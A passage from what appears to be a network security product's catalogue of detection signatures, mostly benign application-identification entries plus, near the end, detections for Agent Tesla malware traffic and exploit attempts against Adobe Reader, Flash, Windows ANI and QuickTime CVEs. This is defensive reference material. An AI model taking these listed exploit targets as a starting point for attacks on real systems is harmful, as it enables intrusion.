Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DNN
Back to top

Dotphoto

About this situation: dotPhoto usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Dotster

About this situation: Application Dotster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dotster is a small business web hosting offering additional business services such as
Back to top

Dotsub

About this situation: Application Dotsub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dotsub technology powers captions and translations as subtitles in any online video in any language so more people will view them across Internet and mobile screens around the world to dramatically increase video viewership, engagement and SEO.
Back to top

Douban

About this situation: Application Douban detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Douban is a Chinese social networking service that offers lifestyle and culture products and services for urbanites and college students.
Back to top

Doubletwist

About this situation: doubleTwist usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: The doubleTwist application enables users to send photos and videos to their friends and sync their media library to a wide variety of portable devices.
Back to top

Dovico

About this situation: Application Dovico detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DOVICO Software develops time management software solutions for various companies in Canada and internationally.
Back to top

Doximity

About this situation: Application Doximity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Doximity offers doctors a searchable directory of physicians as well as HIPAA-secure case collaboration, physician-to-physician messaging, and curated medical news.
Back to top

Doyenz-rCloud

About this situation: Application Doyenz-rCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Doyenz rCloud is the only cloud recovery solution that replicates and recovers VMware ESX virtual machines for SMBs.
Back to top

Dozeo

About this situation: Application Dozeo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dozeo provides suite of environments foster solutions, connections and productivity.
Back to top

Dpsolutions

About this situation: Application Dpsolutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DP Solutions is a IT services provider offering Managed Network Services, Managed Cloud Services and High Availability solutions. DP Solutions offer geographically diverse data centers to handle the daily monitoring of our clients network traffic and continual tracking of security issues and threats.
Back to top

Draugiem.lv

About this situation: draugiem.lv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Draugiem is a social networking website launched on 2004. Website plays important part in everyday life of internet users of Latvia and is frequently used as a tool of communication instead of e-mail.
Back to top

DrawLoop

About this situation: Application DrawLoop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Drawloop provide a repeatable process for creating, managing and sending documents entirely in Salesforce that improves accuracy and team productivity.
Back to top

Dream-Broker

About this situation: Application Dream-Broker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dream Broker is an online video software company that offers an easy-to-use cloud-based online video platform for creating, editing and sharing videos.
Back to top

Dreambox

About this situation: Dreambox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: DreamBox offers nearly 1800 lessons with millions of paths through the curriculum. To engage students exactly where they are, it adjusts in real time, adapting hints, level of difficulty, pace, and sequence.
Back to top

DreamHost

About this situation: Application DreamHost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DreamHost is a web hosting provider and domain name registrar.
Back to top

DreamTeam-Project-Management

About this situation: Application DreamTeam-Project-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DreamTeam Suite is widely deployed project, document and data collaboration suite for corporate clouds.
Back to top

Dremus

About this situation: Application Dremus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dremus is an online selling tool for business, a totally customizable hosted e-commerce solution.
Back to top

DrexelOne

About this situation: Application DrexelOne detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DrexelOne is a app that lets to users access personal, academic, financial, and career information.
Back to top

Dribbble

About this situation: Application Dribbble detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dribbble is a community of designers answering that question each day. Web designers, graphic designers, illustrators, icon artists, typographers, logo designers, and other creative types share small screenshots
Back to top

DriveHQ

About this situation: DriveHQ usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Storage
First detected in: sgpkg-ips-541-5211
Last changed: sgpkg-ips-629-5211
Description: DriveHQ is an online storage and backup service provided by the Drive Headquarters company.
Back to top

DrivePop

About this situation: Application DrivePop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DrivePop helps you share and store files with anyone in the cloud. Easily SYNC data across PC/Mac.
Back to top

Drivy

About this situation: Application Drivy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Drivy is marketplace for car rental
Back to top

DroidVPN

About this situation: DroidVPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-1022-5242
Description: DroidVPN is a network traffic anonymizing tool developed for Android devices.
Back to top

Drop.io

About this situation: Drop.io usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a global file sharing sevice that allows users to upload files of any type, and access them via the internet, e mail, phone, fax, and widgets. It offers 100 megabytes of free storage; users can upgrade to 25 gigabytes of storage for an annual fee. Drop.io offers an additional business and education oriented service called Manager, which aims to replace FTP systems for file sharing. Source: Wikipedia
Back to top

Dropbox

About this situation: Endpoint Context Agent based Dropbox detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Description: Dropbox endpoint application has been detected. Dropbox is a file hosting service.
Back to top

Dropbox

About this situation: Dropbox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1387-5242
Description: Dropbox is a free service that lets users upload and share photos, documents, and videos. This application identifies both the use of the Dropbox client application and browser usage.
Back to top

Dropbox Update

About this situation: Endpoint Context Agent based Dropbox Update detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Description: Dropbox Update endpoint application has been detected. DropBox is a file hosting service. Dropbox update is used for checking, downloading and installing updates for Dropbox.
Back to top

Dropbox-File-Upload

About this situation: Dropbox file upload detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-1282-5242
Last changed: sgpkg-ips-1387-5242
Description: Dropbox is a free service that lets users upload and share photos, documents, and videos. This application identifies file uploads to Dropbox. For this application to be identified, the traffic needs to be decrypted. The Dropbox client does not allow decrypting the traffic, so this application can only identify file uploads via browser.
Back to top

Dropcam

About this situation: Application Dropcam detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dropcam is Wi-Fi internet IP camera with online recording and viewing on iPhone, Android, and laptop.
Back to top

DropCanvas

About this situation: Application DropCanvas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DropCanvas - service for transferring images and files.
Back to top

Droplr

About this situation: Droplr usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1086-5242
Description: Droplr is an online file-sharing service that allows users to upload files from their PC, Mac and iPhone. The uploaded files can be accessed on any PC, Mac and iPhone with an internet connection by logging in at the website, entering the URL for the file or via the applications for available.
Back to top

Dropmysite

About this situation: Application Dropmysite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dropmysite - website monitoring and automated backups for your website and MySQL/PostgreSQL databases.
Back to top

Dropsend

About this situation: DropSend usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: This site provide file sharing service that allows users to share files of personal use as well as business use.
Back to top

Dropshots

About this situation: DropShots usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Drugs

About this situation: The parent category that contains the following categories: Abused Drugs, Marijuana. Nutrition and Prescribed Medications.
Context: URL Application Context
Severity: 1
Tags: Drugs, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Abused Drugs, Marijuana. Nutrition and Prescribed Medications.
Back to top

Drumbi

About this situation: Application Drumbi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Drumbi provides cloud computing-based phone systems to phone support without big phone trees. Drumbi allows teams to answer phone calls with significantly more customer information
Back to top

Drupal

About this situation: Application Drupal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Drupal is a content management software.
Back to top

Drupalize.Me

About this situation: Application Drupalize.Me detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Drupalize.Me is a provider of training services with video training library.
Back to top

Druva

About this situation: Application Druva detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SaaS platform for data protection and management across edge, on-premises and cloud workloads.
Back to top

dscsag

About this situation: Application dscsag detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DSC Software AG MAKE ENGINEERS
Back to top

DSI

About this situation: Application DSI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DSI is the mobile supply chain company. It offers solutions that provide end-to-end visibility, execution and business agility across the supply chain.
Back to top

DSpace

About this situation: Application DSpace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DSpace is a turnkey institutional repository application offering academic, non-profit, and commercial organizations the opportunity to build open digital repositories.
Back to top

DSRegCmd

About this situation: Endpoint Context Agent based dsregcmd.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: A network connection launched by the Windows system process dsregcmd.exe was detected. Dsregcmd.exe is a command line tool used for domain related functions such as joining or status queries.
Back to top

dstglobalsolutions

About this situation: Application dstglobalsolutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SS and C provides financial services industry with a broad range of highly specialized software, software enabled-services and software as a service
Back to top

DTLS

About this situation: DTLS traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1571-5242
Description: DTLS - Datagram Transport Layer Security is protocol that provides communications privacy for datagram protocol. DTLS is designed to construct TLS over datagram.
Back to top

dts

About this situation: Application dts detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DTS is a audio solutions provider for high-definition entertainment experiences-anytime, anywhere, on any device. DTS audio solutions enable delivery and playback of clear, compelling high-definition audio which is incorporated by hundreds of licensee customers around the world, into an array of consumer electronic devices.
Back to top

DuckDuckGo

About this situation: DuckDuckGo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-630-5211
Description: DuckDuckGo is an anonymous and non-filtering search engine.
Back to top

DuckDuckGo Safe Resolve

About this situation: This defines a resolve rule used when DuckDuckGo safe mode is enforced.
Context: DNS Host Resolution
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1210-5242
Description: This defines a rewriting rule used when DuckDuckGo safe mode is enforced.
Back to top

DuckDuckGo Safe Rewrite

About this situation: This defines a rewrite rule used when DuckDuckGo safe mode is enforced.
Context: DNS Host Rewriting
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1210-5242
Description: This defines a rewriting rule used when DuckDuckGo safe mode is enforced.
Back to top

Ducksboard

About this situation: Ducksboard usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This application allows users to monitor business metrics with a real-time visualization of key indicators.
Back to top

DueDil

About this situation: Application DueDil detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DueDil is a tool and company database which provides business, accounting and director information on businesses.
Back to top

Dungeons-And-Dragons-Online

About this situation: Dungeons and Dragons Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Duolingo

About this situation: Duolingo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1828-5242
Last changed: sgpkg-ips-1828-5242
Description: Duolingo Inc. is an American educational technology company that produces learning apps and provides language certification.
Back to top

DurableDNS

About this situation: Application DurableDNS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DurableDNS - DNS managing tool
Back to top

DwDrive

About this situation: Application DwDrive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DwDrive is online backup and cloud solution.
Back to top

Dwolla

About this situation: Application Dwolla detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dwolla is a web based software platform allowing users to send, receive, and request funds from another user.
Back to top

DXC.technology

About this situation: Application DXC.technology detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CSC provides Next Generation IT Infrastructure Services, Cloud Computing, Cyber Security, Big Data, Consulting and Industry Focused Application solutions.
Back to top

DXL_Broker_connection_error

About this situation: Connection with DXL broker is not established.
Context: DXL without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Connection with DXL broker is not established.
Back to top

DXL_Broker_connection_ok

About this situation: Connection with broker established.
Context: DXL without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Connection with broker established.
Back to top

DXL_File_reputation_declined

About this situation: File reputation coming from the update is worse than file reputation of this file coming from the cache.
Context: DXL without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: File reputation coming from the update is worse than file reputation of this file coming from the cache.
Back to top

DXL_File_reputation_defined

About this situation: File reputation after the update was changed from "Not Available" to some value..
Context: DXL without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: File reputation after the update was changed from "Not Available" to some value.
Back to top

DXL_File_reputation_erased

About this situation: File reputation after the update was changed to "Not Available".
Context: DXL without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: File reputation after the update was changed to "Not Available".
Back to top

DXL_File_reputation_improved

About this situation: File reputation coming from the update is better than file reputation of this file coming from the cache.
Context: DXL without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: File reputation coming from the update is better than file reputation of this file coming from the cache.
Back to top

Dyn

About this situation: Dyn usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This provides DNS traffic management, message management, and performance assurance to commercial and private users. Source: Wikipedia
Back to top

DynAdmic

About this situation: DynAdmic usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-762-5211
Last changed: sgpkg-ips-762-5211
Description: DynAdmic is a French marketing and advertising service.
Back to top

Dynadot

About this situation: Application Dynadot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dynadot is an ICANN accredited domain name registrar and web host.
Back to top

Dynamic Content

About this situation: URLs that are generated dynamically by a web server.
Context: URL Application Context
Severity: 1
Tags: Miscellaneous
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: URLs that are generated dynamically by a web server.
Back to top

Dynamic DNS

About this situation: Sites that mask their identity using Dynamic DNS services, often associated with advanced persistent threats (APTs).
Context: URL Application Context
Severity: 1
Tags: Extended Protection, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that mask their identity using Dynamic DNS services, often associated with advanced persistent threats (APTs).
Back to top

Dynamic_Routing_Neighbor_Down

About this situation: An Alert SID when a dynamic routing neighbouring is lost
Context: Dynamic-Routing
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-972-5242
Description: A dynamic routing adjacency is lost.
Back to top

Dynamic_Routing_Neighbor_UP

About this situation: An Alert SID when a dynamic routing neighbouring is established
Context: Dynamic-Routing
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-972-5242
Description: A dynamic routing adjacency is established
Back to top

Dynamic_Routing_Not_Started

About this situation: A dynamic routing is not started correctly
Context: Dynamic-Routing
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-972-5242
Description: The dynamic routing protocols have not been started correctly. See info field for details.
Back to top

Dynamic_Routing_Route_Added

About this situation: A route added via dynamic routing
Context: Dynamic-Routing
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-972-5242
Description: A Route added via dynamic routing. See info field for details.
Back to top

Dynamic_Routing_Route_Deleted

About this situation: A route added via dynamic routing
Context: Dynamic-Routing
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-972-5242
Description: A Route deleted via dynamic routing. See info field for details.
Back to top

Dynamsoft

About this situation: Dynamsoft usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Software development toolkit for document scanning, webcam capture, image processing, barcode recognition, OCR, PDF Rasterizer.
Back to top

Dynatrace

About this situation: Application Dynatrace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dynatrace enables customer to operate with Digital Performance Management.
Back to top

Dzone-Software

About this situation: Application Dzone-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AnswerHub by DZone Software helps developers capture, organize, and share their knowledge for greater productivity, innovation, and user satisfaction.
Back to top

e-Builder

About this situation: Application e-Builder detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: e-Builder is the company that develops web-based capital program management and construction project management software.
Back to top

E-conomic

About this situation: Application E-conomic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: E-conomic addresses all your bookkeeping needs in one intuitive accounting program.
Back to top

e-DECA

About this situation: Application e-DECA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: e-DECA 2.0 application provides programs with the ability to administer, score, save and report on the infant, toddler and preschool DECA assessments on one database platform.
Back to top

E-Mail_Agent-Tesla-SMTP-Traffic

About this situation: Agent Tesla SMTP traffic was detected
Context: E-Mail Header Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1091-5242
Vulnerability: Agent-Tesla-SMTP-Traffic
Description:
Back to top

E-Mail_Base64-Syntax-Incorrect

About this situation: Base64 encoding used incorrect syntax
Context: E-mail without parameters
Severity: 2
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-454-4333
Description: The E-mail message uses Base64 transfer encoding, but does not follow the syntax specification [RFC2045]. This can be caused by a sender that does not follow the E-mail message structure specifications, or this may be an evasion attempt by encoding the message in a way that is not generally supported. As such, this situation is probably not very severe. However, this may affect further checks for the E-mail message, because it is unclear how the mail recipient software will decode the message.
Back to top

E-Mail_Boundary-String-Too-Long

About this situation: E-mail message specified too long multipart boundary delimiter
Context: E-mail without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An e-mail message specified a multipart boundary delimiter that was too long. The e-mail message violates the multipart message specification [RFC 2046]. Risk analysis: Risk level is fairly low. Very long boundary delimiters can be used in buffer overflow attacks.
Back to top

E-Mail_BS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow

About this situation: A malicious PDF file targeted to exploit an integer overflow vulnerability in Adobe Acrobat and Adobe Reader products detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-261-3038
Vulnerability: Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
Description:
Back to top

E-Mail_BS-Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader for Unix or Linux detected
Context: E-Mail Body Stream
Severity: 7
Tags: Unix, Any Hardware, Adobe Reader, CVE2004, Unix not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution
Description:
Back to top

E-Mail_BS-Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption

About this situation: A malicious PDF file targeted to exploit a memory corruption vulnerability in Adobe Acrobat Reader and Acrobat Professional products detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-263-3038
Last changed: sgpkg-ips-263-3038
Vulnerability: Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
Description:
Back to top

E-Mail_BS-Adobe-authplay.dll-CVE-2010-1297-Exploit

About this situation: A malicious PDF file targeting CVE-2010-1297 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Reader, Adobe Acrobat, CVE2010, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-311-4219
Last changed: sgpkg-ips-312-4219
Vulnerability: Adobe-authplay.dll-Code-Execution-CVE-2010-1297
Description:
Back to top

E-Mail_BS-Adobe-Flash-Embedded-In-PDF-Download

About this situation: Detected a download of Adobe Flash content embedded in PDF
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-311-4219
Last changed: sgpkg-ips-988-5242
Vulnerability: Adobe-Flash-Media-Content
Description:
Back to top

E-Mail_BS-Adobe-Flash-Exploit-CVE-2011-0609

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-383-4219
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0609
Description:
Back to top

E-Mail_BS-Adobe-Reader-Integer-Overflow-CVE-2010-2862

About this situation: A malicious PDF document targeting CVE-2010-2862 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2010, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-332-4219
Last changed: sgpkg-ips-332-4219
Vulnerability: Adobe-Reader-Integer-Overflow-CVE-2010-2862
Description:
Back to top

E-Mail_BS-Ani-Windows-Animationheader-Length-Buffer-Overflow

About this situation: Malicious ANI file detected, possible system compromise
Context: E-Mail Body Stream
Severity: 10
Tags: Windows 2003, Windows 2000 SP4, Windows XP SP2, Windows Vista, x86, MS2007-04, CVE2007, Windows 2003 not specific, Windows Vista not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-101-1314
Last changed: sgpkg-ips-167-2032
Vulnerability: Ani-Windows-Animated-Cursor-Code-Execution
Description:
Back to top

E-Mail_BS-Apple-QuickTime-BMP-Handling-Buffer-Overflow

About this situation: Exploit against buffer overflow vulnerability in Apple QuickTime's BMP image handling
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-148-2032
